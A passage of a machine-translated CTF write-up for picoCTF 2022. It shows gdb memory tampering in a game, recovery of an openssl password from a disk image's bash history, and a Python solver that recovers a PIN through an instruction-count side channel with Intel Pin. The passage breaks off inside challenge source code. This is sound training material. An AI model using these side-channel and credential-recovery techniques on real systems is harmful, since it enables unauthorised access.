{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-picoctf-2022-en","result":{"data":{"markdownRemark":{"id":"bb4f7c5a-2aaa-570b-96fb-31f3e8de1078","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-picoctf-2022\">original page</a>.</p>\n</blockquote>\n<p>I participated in <a href=\"https://play.picoctf.org/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">picoCTF2022</a>.</p>\n<p>This time I tried some Forensic and Pwn challenges in addition to my usual Rev.</p>\n<p>I cleared all of the Rev and Forensic challenges, but unfortunately I still had two Pwn problems left unsolved.</p>\n<p>Even so, I picked up around three new techniques, so it was very worthwhile.</p>\n<p>In this article, I’ll briefly write up the problems where I personally learned something.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#rev\">Rev</a></p>\n<ul>\n<li><a href=\"#wizardlikerev\">Wizardlike(Rev)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#forensic\">Forensic</a></p>\n<ul>\n<li><a href=\"#operation-orchidforensic\">Operation Orchid(Forensic)</a></li>\n<li><a href=\"#sidechannelsidechannel\">SideChannel(SideChannel)</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#pwn\">Pwn</a></p>\n<ul>\n<li><a href=\"#function-overwritepwn\">function 
overwrite(Pwn)</a></li>\n<li><a href=\"#ropfupwn\">ropfu(Pwn)</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"rev\" style=\"position:relative;\"><a href=\"#rev\" aria-label=\"rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Rev</h2>\n<p>To be honest, the Rev challenges were fairly easy overall, so there is not much to write about. But the last one was an unusual type of problem and pretty interesting, so I wanted to summarize it.</p>\n<h3 id=\"wizardlikerev\" style=\"position:relative;\"><a href=\"#wizardlikerev\" aria-label=\"wizardlikerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wizardlike(Rev)</h3>\n<p>The problem statement looked like this.</p>\n<blockquote>\n<h4 id=\"description\" style=\"position:relative;\"><a href=\"#description\" aria-label=\"description permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 
0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Do you seek your destiny in these deplorable dungeons? If so, you may want to look elsewhere. Many have gone before you and honestly, they’ve cleared out the place of all monsters, ne’erdowells, bandits and every other sort of evil foe. The dungeons themselves have seen better days too. There’s a lot of missing floors and key passages blocked off. You’d have to be a real wizard to make any progress in this sorry excuse for a dungeon! Download the <a href=\"https://artifacts.picoctf.net/c/153/game\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">game</a>. ’<code class=\"language-text\">w</code>’, ’<code class=\"language-text\">a</code>’, ’<code class=\"language-text\">s</code>’, ’<code class=\"language-text\">d</code>’ moves your character and ’<code class=\"language-text\">Q</code>’ quits. You’ll need to improvise some wizardly abilities to find the flag in this dungeon crawl. 
’<code class=\"language-text\">.</code>’ is floor, ’<code class=\"language-text\">#</code>’ are walls, ’<code class=\"language-text\">&lt;</code>’ are stairs up to previous level, and ’<code class=\"language-text\">></code>’ are stairs down to next level.</p>\n</blockquote>\n<p>You are given a game binary that feels like a console version of The Tower of Druaga.</p>\n<p>The challenge is to climb the tower and uncover the flag, but unfortunately the map is structured so that you cannot climb it by playing normally.</p>\n<p>Because of that, the intended solution was probably to identify the memory addresses storing the floor and coordinates, then tamper with them arbitrarily to warp around the map while exploring.</p>\n<p>The memory addresses for the floor and coordinates themselves can be obtained easily by decompiling the binary with Ghidra or a similar tool.</p>\n<p>To modify memory addresses during gameplay, I used gdb remote debugging.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># gdbserverを使用してゲームを起動</span>\ngdbserver localhost:1234 game-p\n\n<span class=\"token comment\"># 別のコンソールからgdbを起動して接続</span>\ngdb\ntarget remote localhost:1234</code></pre></div>\n<p>With this, you can solve the challenge while moving between floors and around the map.</p>\n<p>Unfortunately, choosing the coordinates for each map move involved a lot of guesswork and was pretty tedious.</p>\n<p>So in the end, I identified the map information for each floor in the data section with Ghidra, then recovered all of the maps at once using the following script, which I reversed from the program used to update the game’s map. 
That let me get the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pprint <span class=\"token keyword\">import</span> pprint\n\ntable <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token punctuation\">[</span><span class=\"token string\">\" \"</span> <span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span> <span class=\"token keyword\">for</span> j <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">]</span>\n\ndata <span class=\"token operator\">=</span> <span class=\"token operator\">&lt;</span>MapData<span class=\"token operator\">></span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> end<span class=\"token operator\">=</span><span class=\"token string\">\"\"</span><span class=\"token 
)</span>\n    <span class=\"token keyword\">if</span>">
punctuation\">)</span>\n    <span class=\"token comment\"># each map row is 100 characters wide, so break the line after every 100th character</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>i <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">100</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"forensic\" style=\"position:relative;\"><a href=\"#forensic\" aria-label=\"forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Forensic</h2>\n<p>I learned several new techniques in the Forensic challenges, so I am recording them here.</p>\n<h3 id=\"operation-orchidforensic\" style=\"position:relative;\"><a href=\"#operation-orchidforensic\" aria-label=\"operation orchidforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Operation Orchid(Forensic)</h3>\n<blockquote>\n<h4 id=\"description-1\" style=\"position:relative;\"><a 
href=\"#description-1\" aria-label=\"description 1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Download this disk image and find the flag.Note: if you are using the webshell, download and extract the disk image into <code class=\"language-text\">/tmp</code> not your home directory.</p>\n</blockquote>\n<p>There was also a similar challenge called “Operation Oni”, but this one was about finding the information you need inside an image file.</p>\n<p>The basic flow was to identify a mountable section inside the image file, mount it locally, and then explore the directories.</p>\n<p>First, use the <code class=\"language-text\">fdisk -lu</code> command to inspect the image file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">fdisk</span> -lu disk.img\nDisk disk.img: <span class=\"token number\">400</span> MiB, <span class=\"token number\">419430400</span> bytes, <span class=\"token number\">819200</span> sectors\nUnits: sectors of <span class=\"token number\">1</span> * <span class=\"token number\">512</span> <span class=\"token operator\">=</span> <span class=\"token number\">512</span> bytes\nSector size <span class=\"token punctuation\">(</span>logical/physical<span class=\"token punctuation\">)</span>: <span class=\"token number\">512</span> bytes / <span class=\"token number\">512</span> bytes\nI/O size <span class=\"token 
punctuation\">(</span>minimum/optimal<span class=\"token punctuation\">)</span>: <span class=\"token number\">512</span> bytes / <span class=\"token number\">512</span> bytes\nDisklabel type: dos\nDisk identifier: 0xb11a86e3\nDevice     Boot  Start    End Sectors  Size Id Type\ndisk.img1  *      <span class=\"token number\">2048</span> <span class=\"token number\">206847</span>  <span class=\"token number\">204800</span>  100M <span class=\"token number\">83</span> Linux\ndisk.img2       <span class=\"token number\">206848</span> <span class=\"token number\">411647</span>  <span class=\"token number\">204800</span>  100M <span class=\"token number\">82</span> Linux swap / Solaris\ndisk.img3       <span class=\"token number\">411648</span> <span class=\"token number\">819199</span>  <span class=\"token number\">407552</span>  199M <span class=\"token number\">83</span> Linux</code></pre></div>\n<p>Here, I wanted to mount <code class=\"language-text\">disk.img3</code>, so I used the <code class=\"language-text\">mount</code> command with an offset equal to the start sector number <code class=\"language-text\">411648</code> multiplied by the sector size <code class=\"language-text\">512</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">mount</span> -o loop,offset<span class=\"token operator\">=</span><span class=\"token number\">210763776</span> disk.img ./mnt\n<span class=\"token function\">sudo</span> <span class=\"token function\">chown</span> ubuntu:ubuntu ./* -R</code></pre></div>\n<p>Changing the owner as well makes exploration easier.</p>\n<p>When I explored the mounted directory, I found the following command history in <code class=\"language-text\">.bash_history</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token 
function\">nano</span> flag.txt \nopenssl\nopenssl aes256 -salt -in flag.txt -out flag.txt.enc -k unbreakablepassword1234567\nshred -u flag.txt\n<span class=\"token function\">ls</span> -al</code></pre></div>\n<p>In other words, if you restore the file encrypted with <code class=\"language-text\">aes256</code> using <code class=\"language-text\">unbreakablepassword1234567</code>, you can get the flag.</p>\n<p>So I decrypted it with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">openssl aes256 -d -salt -in flag.txt.enc -out flag.txt -k unbreakablepassword1234567</code></pre></div>\n<p>That gives you the flag.</p>\n<h3 id=\"sidechannelsidechannel\" style=\"position:relative;\"><a href=\"#sidechannelsidechannel\" aria-label=\"sidechannelsidechannel permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SideChannel(SideChannel)</h3>\n<blockquote>\n<h4 id=\"description-2\" style=\"position:relative;\"><a href=\"#description-2\" aria-label=\"description 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 
11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>There’s something fishy about this PIN-code checker, can you figure out the PIN and get the flag? Download the PIN checker program here <a href=\"https://artifacts.picoctf.net/c/146/pin_checker\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">pin_checker</a>. Once you’ve figured out the PIN (and gotten the checker program to accept it), connect to the master server using <code class=\"language-text\">nc saturn.picoctf.net 50562</code> and provide it the PIN to get your flag.</p>\n</blockquote>\n<p>I understood how to approach this one, but actually getting the flag was very difficult. Still, it was an extremely interesting problem.</p>\n<p>First, download PinTool from <a href=\"https://www.intel.com/content/www/us/en/developer/articles/tool/pin-a-binary-instrumentation-tool-downloads.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Pin - A Binary Instrumentation Tool - Downloads</a>.</p>\n<p>When you extract the downloaded file, you get a directory like this.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">ls</span> -l\ntotal <span class=\"token number\">388</span>\n-rw-r--r-- <span class=\"token number\">1</span> ubuntu ubuntu  <span class=\"token number\">63816</span> Feb <span class=\"token number\">16</span> 02:04 README\ndrwxr-x--- <span class=\"token number\">3</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 doc\ndrwxr-x--- <span class=\"token number\">9</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 extras\ndrwxr-x--- <span class=\"token number\">6</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:12 ia32\ndrwxr-x--- <span class=\"token number\">6</span> 
ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 intel64\ndrwxr-xr-x <span class=\"token number\">2</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 licensing\n-rwxr-xr-x <span class=\"token number\">1</span> ubuntu ubuntu <span class=\"token number\">292996</span> Feb <span class=\"token number\">16</span> 02:09 pin\n-rwxr-x--- <span class=\"token number\">1</span> ubuntu ubuntu   <span class=\"token number\">8418</span> Feb <span class=\"token number\">16</span> 02:15 pin.sig\ndrwxr-x--- <span class=\"token number\">5</span> ubuntu ubuntu   <span class=\"token number\">4096</span> Feb <span class=\"token number\">16</span> 02:14 <span class=\"token builtin class-name\">source</span></code></pre></div>\n<p>From there, you need to build PinTool, and since the challenge binary is a 32-bit ELF binary, you need to build the <code class=\"language-text\">ia32</code> tools.</p>\n<p>So first, install the packages required for the build.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">apt-get</span> <span class=\"token function\">install</span> libc6-dev-i386\n<span class=\"token function\">sudo</span> <span class=\"token function\">apt-get</span> <span class=\"token function\">install</span> gcc-multilib g++-multilib</code></pre></div>\n<p>Next, move to <code class=\"language-text\">source/tools/SimpleExamples</code> and build the tool.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">cd</span> source/tools/SimpleExamples$\n<span class=\"token function\">make</span> all <span class=\"token assign-left variable\">TARGET</span><span class=\"token operator\">=</span>ia32</code></pre></div>\n<p>Note that 
you need to specify <code class=\"language-text\">TARGET=ia32</code>.</p>\n<p>If the build succeeds, <code class=\"language-text\">~/pintools/source/tools/SimpleExamples/obj-ia32/inscount2_mt.so</code> should be generated.</p>\n<p>Then you can use it to identify the PIN one digit at a time with a side-channel attack.</p>\n<p>Below is the solver I used.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> subprocess\ncmd <span class=\"token operator\">=</span> <span class=\"token string\">\"/home/ubuntu/pintools/pin -t /home/ubuntu/pintools/source/tools/SimpleExamples/obj-ia32/inscount2_mt.so -- ./pin_checker\"</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span>\nans <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    t <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"0\"</span><span class=\"token operator\">*</span><span class=\"token number\">7</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>t<span class=\"token punctuation\">)</span>\n    cp <span class=\"token operator\">=</span> subprocess<span class=\"token punctuation\">.</span>run<span 
class=\"token punctuation\">(</span>cmd<span class=\"token punctuation\">,</span> <span class=\"token builtin\">input</span><span class=\"token operator\">=</span>t<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    \n<span class=\"token comment\"># 48390513</span></code></pre></div>\n<p>The code above changes the first digit and checks the result.</p>\n<p>If you look at each PIN input and the pintool count results from running it, you can see that the value becomes extremely large when the first digit is <code class=\"language-text\">4</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">00000000\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">53421446</span>\n\n<span class=\"token number\">10000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">60610315</span>\n\n<span class=\"token number\">20000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">66361386</span>\n\n<span class=\"token number\">30000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">66840760</span>\n\n<span class=\"token number\">40000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token 
operator\">=</span> <span class=\"token number\">314657590</span>\n\n<span class=\"token number\">50000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61089559</span>\n\n<span class=\"token number\">60000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61568816</span>\n\n<span class=\"token number\">70000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">62527330</span>\n\n<span class=\"token number\">80000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">61089676</span>\n\n<span class=\"token number\">90000000</span>\nCount<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">62048086</span></code></pre></div>\n<p>After that, you can identify the correct PIN by repeating the same process for all eight digits.</p>\n<h2 id=\"pwn\" style=\"position:relative;\"><a href=\"#pwn\" aria-label=\"pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 
1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Pwn</h2>\n<h3 id=\"function-overwritepwn\" style=\"position:relative;\"><a href=\"#function-overwritepwn\" aria-label=\"function overwritepwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>function overwrite(Pwn)</h3>\n<blockquote>\n<h4 id=\"description-3\" style=\"position:relative;\"><a href=\"#description-3\" aria-label=\"description 3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>Story telling class 2/2</p>\n</blockquote>\n<p>This hardly counts as a description, but the challenge provided the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token 
directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;wchar.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;locale.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUFSIZE</span> <span class=\"token expression\"><span class=\"token number\">64</span></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">FLAGSIZE</span> <span class=\"token expression\"><span class=\"token number\">64</span></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span 
